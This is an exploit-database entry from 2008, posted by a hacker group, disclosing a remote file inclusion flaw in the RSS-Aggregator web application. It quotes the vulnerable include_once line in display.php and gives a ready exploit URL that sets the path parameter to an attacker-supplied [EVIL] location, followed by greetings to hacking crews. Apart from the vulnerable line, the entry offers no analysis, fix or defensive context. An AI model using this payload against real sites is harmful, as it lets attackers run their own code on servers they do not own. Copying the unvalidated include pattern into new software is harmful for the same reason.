RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability

2008-06-22T00:00:00
ID 1337DAY-ID-3260
Type zdt
Reporter Ghost Hacker
Modified 2008-06-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability
=====================================================================



##############################################################
 RSS-aggregator (display) Remote File Inclusion Vulnerability
##############################################################
[~] Found : Ghost Hacker [ R-H TeaM ]
[~] Script : RSS-aggregator
[~] Download Script : http://www.rss-aggregator.com/download.php
=========================== [ Viva IslaM ] ==========================
Error ( display.PHP ) :
include_once($path.'/admin/fonctions/config.php');

Exploit :
http://xxxx/[Path]/display.php?path=[EVIL]
=========================== [ Viva IslaM ] ==========================
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & v4 TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & Jiko & Mr.JUVE
Mr.hope & Mr.MoSoS & x.CJP.x & Dr.Shares & eLe$ & MR.SQL & QaT HaCkEr ..
All Member Real Hack And All My Friends ..



#  0day.today [2018-01-02]  #